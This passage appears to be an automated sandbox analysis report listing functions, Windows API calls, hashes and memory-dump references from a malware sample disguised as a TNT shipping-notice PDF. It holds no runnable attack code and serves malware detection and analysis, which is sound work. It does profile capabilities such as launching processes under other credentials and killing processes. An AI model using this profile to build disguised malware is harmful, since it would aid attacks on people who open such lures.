String ID:
API String ID: 3368777196-0
Opcode ID: fe9e3ceee2f7ed1fbff74af05d0e7eb890dbf4327716b47fdf51acb01815a653
Instruction ID: 20bcf761f3eec1c7135c384a979762d5532e9ad8afedbaa238719b142584e7d2
Opcode Fuzzy Hash: fe9e3ceee2f7ed1fbff74af05d0e7eb890dbf4327716b47fdf51acb01815a653
Instruction Fuzzy Hash: C9415771900205AFDF14AF58DC85A6AB7B9FF44300F1440A5E905DE297DB31DE60EFA1

Function 009581DB Relevance: 9.1, APIs: 6, Instructions: 104windowCOMMON

Download Yara Rule

APIs

ShowWindow.USER32(FFFFFFFF,00000000,?,00000000,00000000,?,0091F3AB,00000000,?,?,00000000,?,0091682C,00000004,00000000,00000000), ref: 0095824C
EnableWindow.USER32(00000000,00000000), ref: 00958272
ShowWindow.USER32(FFFFFFFF,00000000), ref: 009582D1
ShowWindow.USER32(00000000,00000004), ref: 009582E5
EnableWindow.USER32(00000000,00000001), ref: 0095830B
SendMessageW.USER32(?,0000130C,00000000,00000000), ref: 0095832F

Memory Dump Source

Source File: 00000000.00000002.1371488122.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.1371473097.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.000000000095C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.0000000000982000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371589581.000000000098C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371609606.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_TNT Express Arrival Notice AWB 8013580 1182023_PDF_.jbxd

Similarity

API ID: Window$Show$Enable$MessageSend
String ID:
API String ID: 642888154-0
Opcode ID: 8dadda82a9d744b80ffc4a48622e1c330b6a1e9f70d6f19eeb649d382bdcaaaf
Instruction ID: e43eced53fab7f4074b6579b222e54029b259b6097a25465b9f4ed14ef20703e
Opcode Fuzzy Hash: 8dadda82a9d744b80ffc4a48622e1c330b6a1e9f70d6f19eeb649d382bdcaaaf
Instruction Fuzzy Hash: CD41F530605701AFDF16CF16D899BE57BE4FB0A756F180169E9189B272CB31A849CF50

Function 00924C7D Relevance: 9.1, APIs: 6, Instructions: 87windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32(?), ref: 00924C95
SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 00924CB2
SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 00924CEA
_wcslen.LIBCMT ref: 00924D08
CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 00924D10
_wcsstr.LIBVCRUNTIME ref: 00924D1A

Memory Dump Source

Source File: 00000000.00000002.1371488122.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.1371473097.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.000000000095C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.0000000000982000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371589581.000000000098C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371609606.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_TNT Express Arrival Notice AWB 8013580 1182023_PDF_.jbxd

Similarity

API ID: MessageSend$BuffCharUpperVisibleWindow_wcslen_wcsstr
String ID:
API String ID: 72514467-0
Opcode ID: 6c95276ae5a235ef981dbf8f1513e6e233bd052556bbac4a4a3759c21f30ed4d
Instruction ID: 230317f21538abfe94ba5da4eba3a901ff44cf68c578322e55322e9bc133c7c7
Opcode Fuzzy Hash: 6c95276ae5a235ef981dbf8f1513e6e233bd052556bbac4a4a3759c21f30ed4d
Instruction Fuzzy Hash: 66212672205221BBEB159B3AFC09E7B7B9CEF45750F10803AF809DA196EA61DD0097A1

Function 0093581E Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 336comCOMMON

Download Yara Rule

APIs

Part of subcall function 008C3AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,008C3A97,?,?,008C2E7F,?,?,?,00000000), ref: 008C3AC2

_wcslen.LIBCMT ref: 0093587B
CoInitialize.OLE32(00000000), ref: 00935995
CoCreateInstance.OLE32(0095FCF8,00000000,00000001,0095FB68,?), ref: 009359AE
CoUninitialize.OLE32 ref: 009359CC

Strings

.lnk, xrefs: 00935876, 009358C1, 00935985

Memory Dump Source

Source File: 00000000.00000002.1371488122.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.1371473097.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.000000000095C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.0000000000982000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371589581.000000000098C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371609606.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_TNT Express Arrival Notice AWB 8013580 1182023_PDF_.jbxd

Similarity

API ID: CreateFullInitializeInstanceNamePathUninitialize_wcslen
String ID: .lnk
API String ID: 3172280962-24824748
Opcode ID: ae5111428e39e3b4f11a3bfc0165be04585389cc78f551251677f0901d445e07
Instruction ID: b71763125f5ee11c269131202e8b35b499aec9bb2eb32729dc86587e85a68e6e
Opcode Fuzzy Hash: ae5111428e39e3b4f11a3bfc0165be04585389cc78f551251677f0901d445e07
Instruction Fuzzy Hash: 22D13D716086019FC714DF28C480A2ABBF5FF89724F16885DF88A9B261DB31ED45CF92

Function 0092175D Relevance: 9.1, APIs: 6, Instructions: 68memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00920FB4: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00920FCA
Part of subcall function 00920FB4: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00920FD6
Part of subcall function 00920FB4: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00920FE5
Part of subcall function 00920FB4: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00920FEC
Part of subcall function 00920FB4: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00921002

GetLengthSid.ADVAPI32(?,00000000,00921335), ref: 009217AE
GetProcessHeap.KERNEL32(00000008,00000000), ref: 009217BA
HeapAlloc.KERNEL32(00000000), ref: 009217C1
CopySid.ADVAPI32(00000000,00000000,?), ref: 009217DA
GetProcessHeap.KERNEL32(00000000,00000000,00921335), ref: 009217EE
HeapFree.KERNEL32(00000000), ref: 009217F5

Memory Dump Source

Source File: 00000000.00000002.1371488122.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.1371473097.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.000000000095C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.0000000000982000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371589581.000000000098C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371609606.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_TNT Express Arrival Notice AWB 8013580 1182023_PDF_.jbxd

Similarity

API ID: Heap$Process$AllocInformationToken$CopyErrorFreeLastLength
String ID:
API String ID: 3008561057-0
Opcode ID: dfd615d0c8d9fa16cb596e2c749e0bee123e3b94ad645f06ad4d526e47b80c68
Instruction ID: 69dc29643a6415d2cd51d71ad1437fc27db40f04ebdc211cdc0f85af15991dc7
Opcode Fuzzy Hash: dfd615d0c8d9fa16cb596e2c749e0bee123e3b94ad645f06ad4d526e47b80c68
Instruction Fuzzy Hash: 3C11EB72618715FFDB208FA4EC48BAF7BACEB91316F104018F481A7215C736A910DBA0

Function 009214CE Relevance: 9.1, APIs: 6, Instructions: 64processCOMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 009214FF
OpenProcessToken.ADVAPI32(00000000), ref: 00921506
CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 00921515
CloseHandle.KERNEL32(00000004), ref: 00921520
CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 0092154F
DestroyEnvironmentBlock.USERENV(00000000), ref: 00921563

Memory Dump Source

Source File: 00000000.00000002.1371488122.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.1371473097.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.000000000095C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.0000000000982000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371589581.000000000098C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371609606.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_TNT Express Arrival Notice AWB 8013580 1182023_PDF_.jbxd

Similarity

API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
String ID:
API String ID: 1413079979-0
Opcode ID: e9ecdd734e7ad940225778ffad56a5f65d2f32dabda5bcd7ba6c7d7195a079ff
Instruction ID: ed9b4abfecb31d2dee01d3bd3bc26e4c203e4cf9d1c7a0ab611043b340c4056f
Opcode Fuzzy Hash: e9ecdd734e7ad940225778ffad56a5f65d2f32dabda5bcd7ba6c7d7195a079ff
Instruction Fuzzy Hash: 1A1144B260420DAFDF118FA8ED49FDA7BA9EB48705F044064FA05A20A0C3758E60EB60

Function 008E3382 Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,008E3379,008E2FE5), ref: 008E3390
___vcrt_FlsGetValue.LIBVCRUNTIME ref: 008E339E
___vcrt_FlsSetValue.LIBVCRUNTIME ref: 008E33B7
SetLastError.KERNEL32(00000000,?,008E3379,008E2FE5), ref: 008E3409

Memory Dump Source

Source File: 00000000.00000002.1371488122.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.1371473097.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.000000000095C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.0000000000982000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371589581.000000000098C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371609606.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_TNT Express Arrival Notice AWB 8013580 1182023_PDF_.jbxd

Similarity

API ID: ErrorLastValue___vcrt_
String ID:
API String ID: 3852720340-0
Opcode ID: 1a15b1552fb5924989bb00f754910bb93d98d1049884697ea70b49d4271b508f
Instruction ID: 2fba58c2bef376518c33c4d6796612493c8b0c96d7ae5ad69b2895813399c5e4
Opcode Fuzzy Hash: 1a15b1552fb5924989bb00f754910bb93d98d1049884697ea70b49d4271b508f
Instruction Fuzzy Hash: 5401DE7221C351BEEA262B7B7C8D9662A94FB273B97300229F410C33F0EF614E016665

Function 008F2D74 Relevance: 9.0, APIs: 6, Instructions: 50COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,008F5686,00903CD6,?,00000000,?,008F5B6A,?,?,?,?,?,008EE6D1,?,00988A48), ref: 008F2D78
_free.LIBCMT ref: 008F2DAB
_free.LIBCMT ref: 008F2DD3
SetLastError.KERNEL32(00000000,?,?,?,?,008EE6D1,?,00988A48,00000010,008C4F4A,?,?,00000000,00903CD6), ref: 008F2DE0
SetLastError.KERNEL32(00000000,?,?,?,?,008EE6D1,?,00988A48,00000010,008C4F4A,?,?,00000000,00903CD6), ref: 008F2DEC
_abort.LIBCMT ref: 008F2DF2

Memory Dump Source

Source File: 00000000.00000002.1371488122.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.1371473097.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.000000000095C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.0000000000982000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371589581.000000000098C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371609606.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_TNT Express Arrival Notice AWB 8013580 1182023_PDF_.jbxd

Similarity

API ID: ErrorLast$_free$_abort
String ID:
API String ID: 3160817290-0
Opcode ID: 007748f38abda8442dbfbf92590871dac71b2fe66607510d0bdaf75e088c5bad
Instruction ID: 440e1ad276db29ee14d43b95c6b5aecd0186797c513c09853885112949e0a760
Opcode Fuzzy Hash: 007748f38abda8442dbfbf92590871dac71b2fe66607510d0bdaf75e088c5bad
Instruction Fuzzy Hash: 2FF0C871549B0D6BC612373DBC1AE3F2559FFC17A6F240519FB24D22E2EF3489015262

Function 00958A24 Relevance: 9.0, APIs: 6, Instructions: 49COMMON

Download Yara Rule

APIs

Part of subcall function 008D9639: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 008D9693
Part of subcall function 008D9639: SelectObject.GDI32(?,00000000), ref: 008D96A2
Part of subcall function 008D9639: BeginPath.GDI32(?), ref: 008D96B9
Part of subcall function 008D9639: SelectObject.GDI32(?,00000000), ref: 008D96E2

MoveToEx.GDI32(?,-00000002,00000000,00000000), ref: 00958A4E
LineTo.GDI32(?,00000003,00000000), ref: 00958A62
MoveToEx.GDI32(?,00000000,-00000002,00000000), ref: 00958A70
LineTo.GDI32(?,00000000,00000003), ref: 00958A80
EndPath.GDI32(?), ref: 00958A90
StrokePath.GDI32(?), ref: 00958AA0

Memory Dump Source

Source File: 00000000.00000002.1371488122.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.1371473097.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.000000000095C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.0000000000982000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371589581.000000000098C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371609606.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_TNT Express Arrival Notice AWB 8013580 1182023_PDF_.jbxd

Similarity

API ID: Path$LineMoveObjectSelect$BeginCreateStroke
String ID:
API String ID: 43455801-0
Opcode ID: 7f0b525a8336fd3fff90f8f2215b9c25f9b78d3c67c54e5838757d9c52ab79c6
Instruction ID: f33be8e3f03ab3a1a26b66a819d85f7b55a17cd977b7592691d58fd26f7799ff
Opcode Fuzzy Hash: 7f0b525a8336fd3fff90f8f2215b9c25f9b78d3c67c54e5838757d9c52ab79c6
Instruction Fuzzy Hash: 35111E7600420DFFDF119F95DC88EAA7F6CEB04391F048012FA19951A1C7719D55EF60

Function 009251FD Relevance: 9.0, APIs: 6, Instructions: 49COMMON

Download Yara Rule

APIs

GetDC.USER32(00000000), ref: 00925218
GetDeviceCaps.GDI32(00000000,00000058), ref: 00925229
GetDeviceCaps.GDI32(00000000,0000005A), ref: 00925230
ReleaseDC.USER32(00000000,00000000), ref: 00925238
MulDiv.KERNEL32(000009EC,?,00000000), ref: 0092524F
MulDiv.KERNEL32(000009EC,00000001,?), ref: 00925261

Memory Dump Source

Source File: 00000000.00000002.1371488122.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.1371473097.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.000000000095C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.0000000000982000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371589581.000000000098C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371609606.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_TNT Express Arrival Notice AWB 8013580 1182023_PDF_.jbxd

Similarity

API ID: CapsDevice$Release
String ID:
API String ID: 1035833867-0
Opcode ID: 25d318a1129aa884810c09c82a87ac5521d6c2ae30377095e1ff272758447516
Instruction ID: 23bea0baf7ced69b58f78316ec9194555fba4b97a93a69731aa53d6d391cd29f
Opcode Fuzzy Hash: 25d318a1129aa884810c09c82a87ac5521d6c2ae30377095e1ff272758447516
Instruction Fuzzy Hash: 2A014FB5A05719BFEF109BA69C49A5EBFB8EB48752F044065FA04A7281D6709900DBA0

Function 008C1BC3 Relevance: 9.0, APIs: 6, Instructions: 44keyboardCOMMON

Download Yara Rule

APIs

MapVirtualKeyW.USER32(0000005B,00000000), ref: 008C1BF4
MapVirtualKeyW.USER32(00000010,00000000), ref: 008C1BFC
MapVirtualKeyW.USER32(000000A0,00000000), ref: 008C1C07
MapVirtualKeyW.USER32(000000A1,00000000), ref: 008C1C12
MapVirtualKeyW.USER32(00000011,00000000), ref: 008C1C1A
MapVirtualKeyW.USER32(00000012,00000000), ref: 008C1C22

Memory Dump Source

Source File: 00000000.00000002.1371488122.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.1371473097.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.000000000095C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.0000000000982000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371589581.000000000098C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371609606.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_TNT Express Arrival Notice AWB 8013580 1182023_PDF_.jbxd

Similarity

API ID: Virtual
String ID:
API String ID: 4278518827-0
Opcode ID: 442f262c9b03fa16867e7c9f8f56bbd66d33fb9c986ceab2b29182acbd71cf02
Instruction ID: a32fdda494ca86202f313dc683eb2534b92dbb0b5ba683b9a39e18a69a222c5e
Opcode Fuzzy Hash: 442f262c9b03fa16867e7c9f8f56bbd66d33fb9c986ceab2b29182acbd71cf02
Instruction Fuzzy Hash: 060167B0902B5ABDE3008F6A8C85B52FFA8FF19354F00411BA15C4BA42C7F5A864CBE5

Function 0092EB20 Relevance: 9.0, APIs: 6, Instructions: 42windowtimethreadCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,00000010,00000000,00000000), ref: 0092EB30
SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 0092EB46
GetWindowThreadProcessId.USER32(?,?), ref: 0092EB55
OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 0092EB64
TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 0092EB6E
CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 0092EB75

Memory Dump Source

Source File: 00000000.00000002.1371488122.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.1371473097.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.000000000095C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.0000000000982000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371589581.000000000098C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371609606.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_TNT Express Arrival Notice AWB 8013580 1182023_PDF_.jbxd

Similarity

API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
String ID:
API String ID: 839392675-0
Opcode ID: 3a6b5ed5b314ff17ecc8231c527eae6adb855a7856f285c8f18af2657f5cb974
Instruction ID: 4bf4ece03a18fd17f98a4e50e5e186c23caeb55624542271de9190541e62dae6
Opcode Fuzzy Hash: 3a6b5ed5b314ff17ecc8231c527eae6adb855a7856f285c8f18af2657f5cb974
Instruction Fuzzy Hash: D5F017B2255759BFE7215B63AC0EEAB3A7CEBCAB12F000158F601D109196A05A01A7B5

Function 00917439 Relevance: 9.0, APIs: 6, Instructions: 37windowCOMMON

Download Yara Rule

APIs

GetClientRect.USER32(?), ref: 00917452
SendMessageW.USER32(?,00001328,00000000,?), ref: 00917469
GetWindowDC.USER32(?), ref: 00917475
GetPixel.GDI32(00000000,?,?), ref: 00917484
ReleaseDC.USER32(?,00000000), ref: 00917496
GetSysColor.USER32(00000005), ref: 009174B0

Memory Dump Source

Source File: 00000000.00000002.1371488122.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.1371473097.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.000000000095C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.0000000000982000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371589581.000000000098C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371609606.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_TNT Express Arrival Notice AWB 8013580 1182023_PDF_.jbxd

Similarity

API ID: ClientColorMessagePixelRectReleaseSendWindow
String ID:
API String ID: 272304278-0
Opcode ID: 17264f21dd0e95249e84dd1da3dfba16f6495e2896f3fb6e5566b88efe99acb9
Instruction ID: c158cbf0d8e5301441ab3cf3b20cb170b128fb324eea9bd18177191adde86379
Opcode Fuzzy Hash: 17264f21dd0e95249e84dd1da3dfba16f6495e2896f3fb6e5566b88efe99acb9
Instruction Fuzzy Hash: 7301787151830AFFEB105FA5DC48BEABBB6FB04312F100160F916A21A0CB311E41EB10

Function 00921874 Relevance: 9.0, APIs: 6, Instructions: 23memorysynchronizationCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(?,000000FF), ref: 0092187F
UnloadUserProfile.USERENV(?,?), ref: 0092188B
CloseHandle.KERNEL32(?), ref: 00921894
CloseHandle.KERNEL32(?), ref: 0092189C
GetProcessHeap.KERNEL32(00000000,?), ref: 009218A5
HeapFree.KERNEL32(00000000), ref: 009218AC

Memory Dump Source

Source File: 00000000.00000002.1371488122.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.1371473097.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.000000000095C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.0000000000982000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371589581.000000000098C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371609606.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_TNT Express Arrival Notice AWB 8013580 1182023_PDF_.jbxd

Similarity

API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
String ID:
API String ID: 146765662-0
Opcode ID: a4cd409df1d3f92154da03d253863eef75af748740e839564b7e56247ac65a31
Instruction ID: 590246aa47335a20049f0f07f615a82b033274df7a1cd2030d6b395f8281085c
Opcode Fuzzy Hash: a4cd409df1d3f92154da03d253863eef75af748740e839564b7e56247ac65a31
Instruction Fuzzy Hash: D3E052B6118705BFDA015BA6ED0C94ABB69FB49B22B508625F22681471CB32A4A1EB50

Function 0092C5D0 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 191windowCOMMON

Download Yara Rule

APIs

Part of subcall function 008C7620: _wcslen.LIBCMT ref: 008C7625

GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 0092C6EE
_wcslen.LIBCMT ref: 0092C735
SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 0092C79C
SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 0092C7CA

Strings

0, xrefs: 0092C6AF

Memory Dump Source

Source File: 00000000.00000002.1371488122.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.1371473097.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.000000000095C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.0000000000982000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371589581.000000000098C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371609606.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_TNT Express Arrival Notice AWB 8013580 1182023_PDF_.jbxd

Similarity

API ID: ItemMenu$Info_wcslen$Default
String ID: 0
API String ID: 1227352736-4108050209
Opcode ID: bccff24655985127fbd6a4c6d78f8e4f74d0ccabdea167d7f52615d73c757565
Instruction ID: 66a0d09cf30306b91c2f9e9b042fe906c36980cf95de902c23ad2272803098b9
Opcode Fuzzy Hash: bccff24655985127fbd6a4c6d78f8e4f74d0ccabdea167d7f52615d73c757565
Instruction Fuzzy Hash: 0851E0B16043219BD714AF28E884B6E77ECEF49314F040A2DF995E32A5DB74D904DB52

Function 0094AD64 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 176COMMON

Download Yara Rule

APIs

ShellExecuteExW.SHELL32(0000003C), ref: 0094AEA3

Part of subcall function 008C7620: _wcslen.LIBCMT ref: 008C7625

GetProcessId.KERNEL32(00000000), ref: 0094AF38
CloseHandle.KERNEL32(00000000), ref: 0094AF67

Strings

@, xrefs: 0094AE72
<, xrefs: 0094AE6B

Memory Dump Source

Source File: 00000000.00000002.1371488122.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.1371473097.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.000000000095C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.0000000000982000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371589581.000000000098C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371609606.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_TNT Express Arrival Notice AWB 8013580 1182023_PDF_.jbxd

Similarity

API ID: CloseExecuteHandleProcessShell_wcslen
String ID: <$@
API String ID: 146682121-1426351568
Opcode ID: c800386e3aef09a31803a331de49c6d33966f2a9ea78215e1fa3de18aec5d93e
Instruction ID: fa36f030eac2715df30516c5107b2c4b354b99f10cb1143b216d5369e73e277c
Opcode Fuzzy Hash: c800386e3aef09a31803a331de49c6d33966f2a9ea78215e1fa3de18aec5d93e
Instruction Fuzzy Hash: 9D712471A00619DFCB14DF59C485A9EBBF4FF08314F048499E856AB3A2CB74ED45CB92

Function 0092719E Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 120comlibraryloaderCOMMON

Download Yara Rule

APIs

CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 00927206
SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 0092723C
GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 0092724D
SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 009272CF

Strings

DllGetClassObject, xrefs: 00927242

Memory Dump Source

Source File: 00000000.00000002.1371488122.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.1371473097.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
